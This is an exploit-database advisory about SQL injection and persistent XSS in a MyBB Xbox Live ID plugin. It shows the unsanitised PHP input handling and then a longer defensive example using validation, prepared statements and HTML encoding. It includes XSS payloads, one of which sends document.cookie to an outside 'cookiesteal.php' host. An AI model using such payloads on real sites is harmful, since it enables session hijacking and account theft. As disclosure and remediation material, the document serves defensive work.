MyBB Xbox Live ID Post SQLi & Persistent XSS Vulnerabilities

2012-12-14T00:00:00
ID 1337DAY-ID-19971
Type zdt
Reporter Mr.P-teo
Modified 2012-12-14T00:00:00

Description

Exploit for php platform in category web applications

                                        
MyBB Xbox Live ID Post SQLi & Persistent XSS

This is a really easy one to exploit: user input is not sanitized at all, so it is written to the database exactly as submitted, as the following lines show:

if (isset($mybb->input['xli']))
   {
      $xli->user_update_data['xli'] = $mybb->input['xli'];
   }

As you can see, no sanitization functions such as mysql_real_escape_string() or htmlentities() are used.

To trigger the SQL error, simply enter the standard ' character; for XSS, enter your code, e.g.:

<script>alert(document.cookie);</script>

or

<script>window.open("http://webcite.com/cookiesteal.php?cookie"+document.cookie);</script>


I'm not going to show the POST SQLi step by step.
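What a fix for the unsanitized 'xli' field looks like, as an added example that is not code from the plugin or from MyBB: the value is checked against an allowlist, stored through a bound parameter, and HTML-encoded on output. Assumptions: PDO with in-memory SQLite stands in for MyBB's database layer, and the users table, the function names and the gamertag format rule are hypothetical.

```php
<?php
// Added example, not plugin code. Table, function names and the gamertag
// format rule are assumptions made for this demonstration.
function validate_xli(string $raw): ?string
{
    $xli = trim($raw);
    // Assumed format: 1-15 characters, letters, digits and spaces only.
    return preg_match('/^[A-Za-z0-9 ]{1,15}$/', $xli) ? $xli : null;
}

// Storage sink: the value travels as a bound parameter, never as SQL text.
function save_xli(PDO $db, int $uid, string $xli): void
{
    $stmt = $db->prepare('UPDATE users SET xli = :xli WHERE uid = :uid');
    $stmt->execute([':xli' => $xli, ':uid' => $uid]);
}

// Output sink: encode for the HTML context at render time.
function render_xli(PDO $db, int $uid): string
{
    $stmt = $db->prepare('SELECT xli FROM users WHERE uid = :uid');
    $stmt->execute([':uid' => $uid]);
    return htmlspecialchars((string) $stmt->fetchColumn(), ENT_QUOTES, 'UTF-8');
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (uid INTEGER PRIMARY KEY, xli TEXT)');
$db->exec("INSERT INTO users (uid, xli) VALUES (1, '')");

// Constructed inputs: the two probes from the advisory and a normal value.
$inputs = ["'", '<script>alert(document.cookie);</script>', 'Example Tag 42'];
foreach ($inputs as $input) {
    $xli = validate_xli($input);
    if ($xli === null) {
        echo 'rejected: ', htmlspecialchars($input, ENT_QUOTES, 'UTF-8'), "\n";
        continue;
    }
    save_xli($db, 1, $xli);
    echo 'stored:   ', render_xli($db, 1), "\n";
}

// Defence in depth: with validation skipped, both sinks still treat it as data.
save_xli($db, 1, "' <script>alert(document.cookie);</script>");
echo 'encoded:  ', render_xli($db, 1), "\n";
```

Inside MyBB itself, the equivalent helpers are $db->escape_string() for values placed in queries and htmlspecialchars_uni() for values placed in templates.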

#  0day.today [2018-01-05]  #